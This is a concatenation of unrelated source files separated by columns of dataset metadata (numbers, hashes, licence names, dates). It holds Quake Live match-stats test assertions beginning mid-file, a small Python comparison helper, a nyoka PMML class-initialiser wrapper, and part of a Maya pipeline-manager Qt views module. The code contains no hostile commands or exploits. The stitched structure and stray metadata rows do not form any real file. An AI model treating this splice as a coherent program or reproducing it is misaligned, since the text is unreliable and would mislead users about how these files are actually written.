assert e[76]['DATA']['WEAPONS']['LIGHTNING']['S'] == 156 # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['T'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['D'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['DG'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['DR'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['H'] == 30 # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['K'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['P'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['S'] == 228 # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['T'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['D'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['DG'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['DR'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['H'] == 2 # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['K'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['P'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['S'] == 6 # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['T'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['D'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['DG'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['DR'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['H'] == 11 # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['K'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['P'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['S'] == 24 # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['T'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['D'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['DG'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['DR'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['H'] == 30 # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['K'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['P'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['S'] == 275 # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['T'] is None # noqa
assert e[76]['DATA']['WIN'] == 0 # noqa
assert e[76]['TYPE'] == 'PLAYER_STATS' # noqa
assert e[77]['DATA']['ABORTED'] is None # noqa
assert e[77]['DATA']['CAPTURE_LIMIT'] == 0 # noqa
assert e[77]['DATA']['EXIT_MSG'] == 'Fraglimit hit.' # noqa
assert e[77]['DATA']['FACTORY'] is None # noqa
assert e[77]['DATA']['FACTORY_TITLE'] is None # noqa
assert e[77]['DATA']['FIRST_SCORER'] is None # noqa
assert e[77]['DATA']['FRAG_LIMIT'] == 20 # noqa
assert e[77]['DATA']['GAME_LENGTH'] == 313000 # noqa
assert e[77]['DATA']['GAME_TYPE'] is None # noqa
assert e[77]['DATA']['INFECTED'] is None # noqa
assert e[77]['DATA']['INSTAGIB'] is None # noqa
assert e[77]['DATA']['LAST_LEAD_CHANGE_TIME'] is None # noqa
assert e[77]['DATA']['LAST_SCORER'] is None # noqa
assert e[77]['DATA']['LAST_TEAMSCORER'] is None # noqa
assert e[77]['DATA']['MAP'] == 'ASYLUM' # noqa
assert e[77]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[77]['DATA']['MERCY_LIMIT'] is None # noqa
assert e[77]['DATA']['QUADHOG'] is None # noqa
assert e[77]['DATA']['RESTARTED'] is None # noqa
assert e[77]['DATA']['ROUND_LIMIT'] is None # noqa
assert e[77]['DATA']['SCORE_LIMIT'] is None # noqa
assert e[77]['DATA']['SERVER_TITLE'] == 'noname' # noqa
assert e[77]['DATA']['TIME'] == 313.0 # noqa
assert e[77]['DATA']['TIME_LIMIT'] == 0 # noqa
assert e[77]['DATA']['TRAINING'] is None # noqa
assert e[77]['DATA']['TSCORE0'] is None # noqa
assert e[77]['DATA']['TSCORE1'] is None # noqa
assert e[77]['DATA']['WARMUP'] == False # noqa
assert e[77]['TYPE'] == 'MATCH_REPORT' # noqa
| 65.616815
| 125
| 0.537901
| 33,332
| 243,504
| 3.901416
| 0.01017
| 0.19809
| 0.311199
| 0.359515
| 0.991534
| 0.988496
| 0.941965
| 0.822127
| 0.450239
| 0
| 0
| 0.060847
| 0.227479
| 243,504
| 3,710
| 126
| 65.634501
| 0.630454
| 0.076126
| 0
| 0
| 0
| 0
| 0.290616
| 0.026342
| 0
| 0
| 0
| 0
| 0.994059
| 1
| 0.00054
| false
| 0
| 0.00108
| 0
| 0.00189
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16858d2ebba9b5ce4fc857b1be28ea888659ba10
| 344
|
py
|
Python
|
gaurabda/GCUT.py
|
gopa810/gaurabda-calendar
|
92c36b5948e9bcbfe991f19f511371aff1cc0fcb
|
[
"MIT"
] | 4
|
2020-09-12T06:32:08.000Z
|
2022-01-15T09:31:31.000Z
|
gaurabda/GCUT.py
|
gopa810/gaurabda-calendar
|
92c36b5948e9bcbfe991f19f511371aff1cc0fcb
|
[
"MIT"
] | 2
|
2020-12-14T14:25:35.000Z
|
2020-12-15T19:06:51.000Z
|
gaurabda/GCUT.py
|
gopa810/gaurabda-calendar
|
92c36b5948e9bcbfe991f19f511371aff1cc0fcb
|
[
"MIT"
] | 4
|
2020-10-10T16:31:05.000Z
|
2021-08-20T17:23:01.000Z
|
def val(a,b,msg):
if a!=b:
print(f'{msg} ... Value left: {a}, value right: {b}')
else:
print(f'{msg} ... OK')
def nval(a,b,msg):
if a==b:
print(f'{msg} ... Value left: {a}, value right: {b}')
else:
print(f'{msg} ... OK')
def info(str):
print(f'--- {str} ---')
def msg(str):
print(str)
| 19.111111
| 61
| 0.456395
| 55
| 344
| 2.854545
| 0.290909
| 0.191083
| 0.229299
| 0.089172
| 0.726115
| 0.726115
| 0.726115
| 0.726115
| 0.726115
| 0.726115
| 0
| 0
| 0.287791
| 344
| 17
| 62
| 20.235294
| 0.640816
| 0
| 0
| 0.428571
| 0
| 0
| 0.357558
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0
| 0.285714
| 0.428571
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
169c5c7fe26ffd91be75995f56da833a96e328e2
| 11,035
|
py
|
Python
|
nyoka/PMML44/wrapper44.py
|
vishalbelsare/nyoka
|
c08e83db2863a963d586b5853b82ef9d8cf799b2
|
[
"Apache-2.0"
] | 71
|
2020-08-24T07:59:56.000Z
|
2022-03-21T08:36:35.000Z
|
nyoka/PMML44/wrapper44.py
|
vishalbelsare/nyoka
|
c08e83db2863a963d586b5853b82ef9d8cf799b2
|
[
"Apache-2.0"
] | 16
|
2020-09-02T10:27:36.000Z
|
2022-03-31T05:37:12.000Z
|
nyoka/PMML44/wrapper44.py
|
vishalbelsare/nyoka
|
c08e83db2863a963d586b5853b82ef9d8cf799b2
|
[
"Apache-2.0"
] | 16
|
2020-09-17T15:01:33.000Z
|
2022-03-28T03:13:25.000Z
|
def parse(inFileName, silence=False):
orig_init()
result = parseSub(inFileName, silence)
new_init()
return result
def new_init():
def ArrayType_init(self, content=None, n=None, type_=None, mixedclass_=None):
self.original_tagname_ = None
self.n = supermod._cast(None, n)
self.type_ = supermod._cast(None, type_)
if mixedclass_ is None:
self.mixedclass_ = supermod.MixedContainer
else:
self.mixedclass_ = mixedclass_
self.content_ = [supermod.MixedContainer(1, 2, "", str(content))]
self.valueOf_ = str(content)
def Annotation_init(self, content=None, Extension=None, mixedclass_=None):
self.original_tagname_ = None
if Extension is None:
self.Extension = []
else:
self.Extension = Extension
if mixedclass_ is None:
self.mixedclass_ = supermod.MixedContainer
else:
self.mixedclass_ = mixedclass_
self.content_ = [supermod.MixedContainer(1, 2, "", str(content))]
self.valueOf_ = str(content)
def Timestamp_init(self, content=None, Extension=None, mixedclass_=None):
self.original_tagname_ = None
if Extension is None:
self.Extension = []
else:
self.Extension = Extension
if mixedclass_ is None:
self.mixedclass_ = supermod.MixedContainer
else:
self.mixedclass_ = mixedclass_
self.content_ = [supermod.MixedContainer(1, 2, "", str(content))]
self.valueOf_ = str(content)
def PMML_init(self, version='4.4', Header=None, MiningBuildTask=None, DataDictionary=None, TransformationDictionary=None, AssociationModel=None, AnomalyDetectionModel=None, BayesianNetworkModel=None, BaselineModel=None, ClusteringModel=None, GaussianProcessModel=None, GeneralRegressionModel=None, MiningModel=None, NaiveBayesModel=None, NearestNeighborModel=None, NeuralNetwork=None, RegressionModel=None, RuleSetModel=None, SequenceModel=None, Scorecard=None, SupportVectorMachineModel=None, TextModel=None, TimeSeriesModel=None, TreeModel=None, Extension=None):
self.original_tagname_ = None
self.version = supermod._cast(None, version)
self.Header = Header
self.MiningBuildTask = MiningBuildTask
self.DataDictionary = DataDictionary
self.TransformationDictionary = TransformationDictionary
if AssociationModel is None:
self.AssociationModel = []
else:
self.AssociationModel = AssociationModel
if AnomalyDetectionModel is None:
self.AnomalyDetectionModel = []
else:
self.AnomalyDetectionModel = AnomalyDetectionModel
if BayesianNetworkModel is None:
self.BayesianNetworkModel = []
else:
self.BayesianNetworkModel = BayesianNetworkModel
if BaselineModel is None:
self.BaselineModel = []
else:
self.BaselineModel = BaselineModel
if ClusteringModel is None:
self.ClusteringModel = []
else:
self.ClusteringModel = ClusteringModel
if GaussianProcessModel is None:
self.GaussianProcessModel = []
else:
self.GaussianProcessModel = GaussianProcessModel
if GeneralRegressionModel is None:
self.GeneralRegressionModel = []
else:
self.GeneralRegressionModel = GeneralRegressionModel
if MiningModel is None:
self.MiningModel = []
else:
self.MiningModel = MiningModel
if NaiveBayesModel is None:
self.NaiveBayesModel = []
else:
self.NaiveBayesModel = NaiveBayesModel
if NearestNeighborModel is None:
self.NearestNeighborModel = []
else:
self.NearestNeighborModel = NearestNeighborModel
if NeuralNetwork is None:
self.NeuralNetwork = []
else:
self.NeuralNetwork = NeuralNetwork
if RegressionModel is None:
self.RegressionModel = []
else:
self.RegressionModel = RegressionModel
if RuleSetModel is None:
self.RuleSetModel = []
else:
self.RuleSetModel = RuleSetModel
if SequenceModel is None:
self.SequenceModel = []
else:
self.SequenceModel = SequenceModel
if Scorecard is None:
self.Scorecard = []
else:
self.Scorecard = Scorecard
if SupportVectorMachineModel is None:
self.SupportVectorMachineModel = []
else:
self.SupportVectorMachineModel = SupportVectorMachineModel
if TextModel is None:
self.TextModel = []
else:
self.TextModel = TextModel
if TimeSeriesModel is None:
self.TimeSeriesModel = []
else:
self.TimeSeriesModel = TimeSeriesModel
if TreeModel is None:
self.TreeModel = []
else:
self.TreeModel = TreeModel
if Extension is None:
self.Extension = []
else:
self.Extension = Extension
ArrayType.__init__ = ArrayType_init
Annotation.__init__ = Annotation_init
Timestamp.__init__ = Timestamp_init
PMML.__init__ = PMML_init
def orig_init():
def ArrayType_init(self, n=None, type_=None, valueOf_=None, mixedclass_=None, content_=None):
self.original_tagname_ = None
self.n = supermod._cast(None, n)
self.type_ = supermod._cast(None, type_)
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = supermod.MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def Annotation_init(self, Extension=None, valueOf_=None, mixedclass_=None, content_=None):
self.original_tagname_ = None
if Extension is None:
self.Extension = []
else:
self.Extension = Extension
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = supermod.MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def Timestamp_init(self, Extension=None, valueOf_=None, mixedclass_=None, content_=None):
self.original_tagname_ = None
if Extension is None:
self.Extension = []
else:
self.Extension = Extension
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = supermod.MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def PMML_init(self, version=None, Header=None, MiningBuildTask=None, DataDictionary=None, TransformationDictionary=None, AssociationModel=None, AnomalyDetectionModel=None, BayesianNetworkModel=None, BaselineModel=None, ClusteringModel=None, GaussianProcessModel=None, GeneralRegressionModel=None, MiningModel=None, NaiveBayesModel=None, NearestNeighborModel=None, NeuralNetwork=None, RegressionModel=None, RuleSetModel=None, SequenceModel=None, Scorecard=None, SupportVectorMachineModel=None, TextModel=None, TimeSeriesModel=None, TreeModel=None, Extension=None):
self.original_tagname_ = None
self.version = supermod._cast(None, version)
self.Header = Header
self.MiningBuildTask = MiningBuildTask
self.DataDictionary = DataDictionary
self.TransformationDictionary = TransformationDictionary
if AssociationModel is None:
self.AssociationModel = []
else:
self.AssociationModel = AssociationModel
if AnomalyDetectionModel is None:
self.AnomalyDetectionModel = []
else:
self.AnomalyDetectionModel = AnomalyDetectionModel
if BayesianNetworkModel is None:
self.BayesianNetworkModel = []
else:
self.BayesianNetworkModel = BayesianNetworkModel
if BaselineModel is None:
self.BaselineModel = []
else:
self.BaselineModel = BaselineModel
if ClusteringModel is None:
self.ClusteringModel = []
else:
self.ClusteringModel = ClusteringModel
if GaussianProcessModel is None:
self.GaussianProcessModel = []
else:
self.GaussianProcessModel = GaussianProcessModel
if GeneralRegressionModel is None:
self.GeneralRegressionModel = []
else:
self.GeneralRegressionModel = GeneralRegressionModel
if MiningModel is None:
self.MiningModel = []
else:
self.MiningModel = MiningModel
if NaiveBayesModel is None:
self.NaiveBayesModel = []
else:
self.NaiveBayesModel = NaiveBayesModel
if NearestNeighborModel is None:
self.NearestNeighborModel = []
else:
self.NearestNeighborModel = NearestNeighborModel
if NeuralNetwork is None:
self.NeuralNetwork = []
else:
self.NeuralNetwork = NeuralNetwork
if RegressionModel is None:
self.RegressionModel = []
else:
self.RegressionModel = RegressionModel
if RuleSetModel is None:
self.RuleSetModel = []
else:
self.RuleSetModel = RuleSetModel
if SequenceModel is None:
self.SequenceModel = []
else:
self.SequenceModel = SequenceModel
if Scorecard is None:
self.Scorecard = []
else:
self.Scorecard = Scorecard
if SupportVectorMachineModel is None:
self.SupportVectorMachineModel = []
else:
self.SupportVectorMachineModel = SupportVectorMachineModel
if TextModel is None:
self.TextModel = []
else:
self.TextModel = TextModel
if TimeSeriesModel is None:
self.TimeSeriesModel = []
else:
self.TimeSeriesModel = TimeSeriesModel
if TreeModel is None:
self.TreeModel = []
else:
self.TreeModel = TreeModel
if Extension is None:
self.Extension = []
else:
self.Extension = Extension
ArrayType.__init__ = ArrayType_init
Annotation.__init__ = Annotation_init
Timestamp.__init__ = Timestamp_init
PMML.__init__ = PMML_init
new_init()
def showIndent(outfile, level, pretty_print=True):
if pretty_print:
for idx in range(level):
outfile.write('\t')
| 38.051724
| 568
| 0.624377
| 940
| 11,035
| 7.171277
| 0.075532
| 0.07714
| 0.078623
| 0.027296
| 0.960688
| 0.947931
| 0.947931
| 0.945854
| 0.945854
| 0.945854
| 0
| 0.001043
| 0.30512
| 11,035
| 289
| 569
| 38.183391
| 0.878065
| 0
| 0
| 0.934307
| 0
| 0
| 0.000453
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043796
| false
| 0
| 0
| 0
| 0.047445
| 0.007299
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16a979b5ecb6ecadf866a52166f3000e7638d4d1
| 121,829
|
py
|
Python
|
libs/views.py
|
ddv0504/pipeline
|
9626871a3d030a2f075530ec0a567cee22fad586
|
[
"MIT"
] | null | null | null |
libs/views.py
|
ddv0504/pipeline
|
9626871a3d030a2f075530ec0a567cee22fad586
|
[
"MIT"
] | null | null | null |
libs/views.py
|
ddv0504/pipeline
|
9626871a3d030a2f075530ec0a567cee22fad586
|
[
"MIT"
] | null | null | null |
'''
PIPELINE 2
Project manager for Maya
Ahutor: Lior Ben Horin
All rights reserved (c) 2017
pipeline.nnl.tv
liorbenhorin@gmail.com
---------------------------------------------------------------------------------------------
install:
Place the pipeline folder in your maya scripts folder and run this code (in python):
import pipeline
pipeline.start()
---------------------------------------------------------------------------------------------
You are using pipeline on you own risk.
Things can always go wrong, and under no circumstances the author
would be responsible for any damages caused from the use of this software.
When using this beta program you hereby agree to allow this program to collect
and send usage data to the author.
---------------------------------------------------------------------------------------------
The coded instructions, statements, computer programs, and/or related
material (collectively the "Data") in these files are subject to the terms
and conditions defined by
Creative Commons Attribution-NonCommercial-NoDerivs 4.0 Unported License:
http://creativecommons.org/licenses/by-nc-nd/4.0/
http://creativecommons.org/licenses/by-nc-nd/4.0/legalcode
http://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.txt
---------------------------------------------------------------------------------------------
'''
#
# import cPickle
import os
import functools
import logging
import pipeline.libs.config as cfg
import pipeline.libs.data as dt
import pipeline.libs.misc as misc
import pipeline.libs.models as models
import pipeline.libs.serializer as serializer
import pipeline.widgets.inputs as inputs
from pipeline.libs.Qt import QtGui, QtWidgets, QtCore, QtCompat
import pipeline.apps.massage as massage
from pipeline.libs import permissions
import pipeline.CSS
from pipeline.CSS import loadCSS
logger = logging.getLogger(__name__)
global counter
class Hierarchy_file_type_delegate(QtWidgets.QItemDelegate):
def __init__(self, parent):
QtWidgets.QItemDelegate.__init__(self, parent)
self.cb = None
def paint(self, painter, option, index):
painter.save()
painter.setPen(QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_GRAY_minus), 0.5))
painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
painter.restore()
super(Hierarchy_file_type_delegate, self).paint(painter, option, index)
def createEditor(self, parent, option, index):
cb = QtWidgets.QComboBox(parent)
cb.setStyleSheet("")
cb.setEditable(False)
roles = ["mayaAscii", "mayaBinary"]
cb.addItems(roles)
return cb
def setEditorData(self, editor, index):
cb = editor
string = index.data(QtCore.Qt.EditRole)
i = cb.findText(string)
if i >= 0:
cb.setCurrentIndex(i)
else:
cb.setCurrentIndex(0)
def setModelData(self, editor, model, index):
cb = editor
model.setData(index, cb.currentText(), QtCore.Qt.EditRole)
class Hierarchy_branches_delegate(QtWidgets.QItemDelegate):
def __init__(self, parent):
QtWidgets.QItemDelegate.__init__(self, parent)
self.cb = None
def paint(self, painter, option, index):
painter.save()
painter.setPen(QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_GRAY_minus), 0.5))
painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
painter.restore()
super(Hierarchy_branches_delegate, self).paint(painter, option, index)
def createEditor(self, parent, option, index):
cb = QtWidgets.QComboBox(parent)
cb.setStyleSheet("")
cb.setEditable(True)
roles = [cfg.Hierarcy_options.ASK_USER] + self.parent().branches
cb.addItems(roles)
return cb
def setEditorData(self, editor, index):
cb = editor
string = index.data(QtCore.Qt.EditRole)
i = cb.findText(string)
if i >= 0:
cb.setCurrentIndex(i)
else:
cb.setCurrentIndex(0)
def setModelData(self, editor, model, index):
cb = editor
model.setData(index, cb.currentText(), QtCore.Qt.EditRole)
class Hierarchy_name_delegate(QtWidgets.QItemDelegate):
def __init__(self, parent):
QtWidgets.QItemDelegate.__init__(self, parent)
self.cb = None
def paint(self, painter, option, index):
painter.save()
painter.setPen(QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_GRAY_minus), 0.5))
painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
painter.restore()
super(Hierarchy_name_delegate, self).paint(painter, option, index)
def createEditor(self, parent, option, index):
cb = QtWidgets.QComboBox(parent)
cb.setStyleSheet("")
cb.setEditable(True)
roles = [str(index.data()), cfg.Hierarcy_options.ASK_USER]
cb.addItems(roles)
return cb
def setEditorData(self, editor, index):
cb = editor
string = str(index.data(QtCore.Qt.EditRole))
i = cb.findText(string)
if i >= 0:
cb.setCurrentIndex(i)
else:
cb.setCurrentIndex(0)
def setModelData(self, editor, model, index):
cb = editor
model.setData(index, cb.currentText(), QtCore.Qt.EditRole)
class Hierarchy_quantitiy_delegate(QtWidgets.QItemDelegate):
def __init__(self, parent):
QtWidgets.QItemDelegate.__init__(self, parent)
self.cb = None
def paint(self, painter, option, index):
painter.save()
painter.setPen(QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_GRAY_minus), 0.5))
painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
painter.restore()
super(Hierarchy_quantitiy_delegate, self).paint(painter, option, index)
def createEditor(self, parent, option, index):
cb = QtWidgets.QComboBox(parent)
cb.setStyleSheet("")
roles = [cfg.Hierarcy_options.SINGLE, cfg.Hierarcy_options.MULTIPLE]
cb.addItems(roles)
return cb
def setEditorData(self, editor, index):
cb = editor
string = index.data(QtCore.Qt.EditRole)
i = cb.findText(string)
if i >= 0:
cb.setCurrentIndex(i)
else:
cb.setCurrentIndex(0)
def setModelData(self, editor, model, index):
cb = editor
model.setData(index, cb.currentText(), QtCore.Qt.EditRole)
class RoleComboBoxDelegate(QtWidgets.QItemDelegate):
def __init__(self, parent):
QtWidgets.QItemDelegate.__init__(self, parent)
self.cb = None
def createEditor(self, parent, option, index):
cb = QtWidgets.QComboBox(parent)
roles = permissions.Permissions.roles.keys()
cb.addItems(roles)
return cb
def setEditorData(self, editor, index):
cb = editor
string = index.data(QtCore.Qt.EditRole)
i = cb.findText(string)
if i >= 0:
cb.setCurrentIndex(i)
else:
cb.setCurrentIndex(0)
def setModelData(self, editor, model, index):
cb = editor
model.setData(index, cb.currentText(), QtCore.Qt.EditRole)
class LinkProjectButtonDelegate(QtWidgets.QItemDelegate):
def __init__(self, parent):
QtWidgets.QItemDelegate.__init__(self, parent)
def paint(self, painter, option, index):
if not self.parent().indexWidget(index):
id = self.parent().model().mapToSource(index)
project = self.parent().model().sourceModel().getNode(id)
if not project.online():
label = "Link"
icon = cfg.link_off_icon
func = self.parent().linkProject
else:
label = "Online"
icon = cfg.link_on_icon
func = self.parent().dummy
button = QtWidgets.QPushButton(
label,
index.data(),
self.parent(),
clicked=func
)
button.setStyleSheet(cfg.table_button_stylesheet)
button.setIconSize(QtCore.QSize(20, 20))
button.setIcon(QtGui.QIcon(icon))
self.parent().setIndexWidget(index, button)
class EditProjectButtonDelegate(QtWidgets.QItemDelegate):
def __init__(self, parent):
QtWidgets.QItemDelegate.__init__(self, parent)
def paint(self, painter, option, index):
if not self.parent().indexWidget(index):
label = "Edit"
icon = cfg.edit_icon
button = QtWidgets.QPushButton(
label,
index.data(),
self.parent(),
clicked=self.parent().editProject
)
button.setIconSize(QtCore.QSize(20, 20))
button.setIcon(QtGui.QIcon(icon))
button.setStyleSheet(cfg.table_button_stylesheet)
index_ = self.parent().model().mapToSource(index)
project = self.parent().model().sourceModel().getNode(index_)
enable = True
if project.project_users:
user = self.parent().parent.pipeline_window.settings.user[0]
password = self.parent().parent.pipeline_window.settings.user[1]
role = project.validate_user(user, password)
if role != 'administrator':
enable = False
button.setEnabled(enable)
self.parent().setIndexWidget(index, button)
class SetProjectButtonDelegate(QtWidgets.QItemDelegate):
def __init__(self, parent):
QtWidgets.QItemDelegate.__init__(self, parent)
def paint(self, painter, option, index):
if not self.parent().indexWidget(index):
label = "Set project"
icon = cfg.set_icon
button = QtWidgets.QPushButton(
label,
index.data(),
self.parent(),
clicked=self.parent().setProject
)
button.setIconSize(QtCore.QSize(20, 20))
button.setIcon(QtGui.QIcon(icon))
button.setStyleSheet(cfg.table_button_stylesheet)
self.parent().setIndexWidget(index, button)
# class Notes_View(QtWidgets.QTableView):
# def __init__(self, parent=None):
# super(Notes_View, self).__init__(parent)
# self.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
# self.setWordWrap(True)
#
# def setModel(self, model=None):
# super(Notes_View, self).setModel(model)
#
# self.horizontalHeader().resizeSection(0, 50)
#
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
#
#
# self.horizontalHeader().resizeSection(1, 100)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Fixed)
#
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.ResizeToContents)
#
#
# self.horizontalHeader().setStretchLastSection(True)
#
# class Project_Levels_View(QtWidgets.QTableView):
# def __init__(self, parent=None):
# super(Project_Levels_View, self).__init__(parent)
#
# self.verticalHeader().setHidden(True)
# self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
#
# def setModel(self, model=None):
# super(Project_Levels_View, self).setModel(model)
#
#
# self.horizontalHeader().resizeSection(0, 30)
#
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
#
# for i in range(1, self.horizontalHeader().count()):
#
# QtCompat.setSectionResizeMode(self.horizontalHeader(), i, QtWidgets.QHeaderView.ResizeToContents)
#
# self.horizontalHeader().setStretchLastSection(True)
#
class Project_Users_View(QtWidgets.QTableView):
def __init__(self, parent=None):
super(Project_Users_View, self).__init__(parent)
self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
def setModel(self, model=None):
super(Project_Users_View, self).setModel(model)
self.setItemDelegateForColumn(2, RoleComboBoxDelegate(self))
QtCompat.setSectionResizeMode(self.horizontalHeader(), QtWidgets.QHeaderView.Stretch)
self.setEditTriggers(QtWidgets.QAbstractItemView.AllEditTriggers)
def contextMenuEvent(self, event):
index = self.indexAt(event.pos())
menu = QtWidgets.QMenu()
actions = []
actions.append(QtWidgets.QAction("New user", menu, triggered=functools.partial(self.new_user, index)))
actions.append(QtWidgets.QAction("Import users from a json file", menu, triggered=self.import_users))
if index.isValid():
actions.append(QtWidgets.QAction("Remove user", menu, triggered=functools.partial(self.remove_user, index)))
menu.addActions(actions)
menu.exec_(event.globalPos())
event.accept() # TELL QT IVE HANDLED THIS THING
return
def remove_user(self, index):
row = index.row()
parent = index.parent()
self.model().removeRows(row, 1, parent)
def new_user(self, index):
user = dt.UserNode("New user", "1234", cfg._admin_)
if index.isValid():
row = index.row()
else:
row = len(self.model().items)
self.model().insertRows(row + 1, 1, QtCore.QModelIndex(), node=user)
def import_users(self):
path = QtWidgets.QFileDialog.getOpenFileName(self, "Select the users file", filter="json files (*.json)")
if path[0]:
users_file = serializer.JSONSerializer(path=str(path[0]))
users_file = users_file.read()
print users_file, "="
self.setModel(None)
users = []
for key in users_file:
users.append(dt.UserNode(key, users_file[key][0], users_file[key][1]))
if users:
self.setModel(models.Users_Model(users))
class Hierarcy_components_view(QtWidgets.QTableView):
def __init__(self, parentWidget=None, parent=None, branches = list()):
super(Hierarcy_components_view, self).__init__(parent)
self.branches = branches
self.parent = parent
self.parentWidget = parentWidget
self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.setShowGrid(False)
self.setFocusPolicy(QtCore.Qt.NoFocus)
def clearModel(self):
self.setModel(None)
def setModel_(self, model=None, delegates = True):
self.clearModel()
if model:
self.setModel(model)
# size the load button column
self.horizontalHeader().resizeSection(5, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(4, 100)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(3, 60)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(2, 120)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().resizeSection(0, 30)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
if delegates:
self.setItemDelegateForColumn(1, Hierarchy_name_delegate(self))
self.setItemDelegateForColumn(2, Hierarchy_branches_delegate(self))
self.setItemDelegateForColumn(3, Hierarchy_name_delegate(self))
self.setItemDelegateForColumn(4, Hierarchy_file_type_delegate(self))
self.setItemDelegateForColumn(5, Hierarchy_file_type_delegate(self))
else:
self.setItemDelegateForColumn(1, Preset_generator_table_Delegate(self))
self.setItemDelegateForColumn(2, Preset_generator_table_Delegate(self))
self.setItemDelegateForColumn(3, Preset_generator_table_Delegate(self))
self.setItemDelegateForColumn(4, Preset_generator_table_Delegate(self))
self.setItemDelegateForColumn(5, Preset_generator_table_Delegate(self))
self.setEditTriggers(QtWidgets.QAbstractItemView.AllEditTriggers)
return True
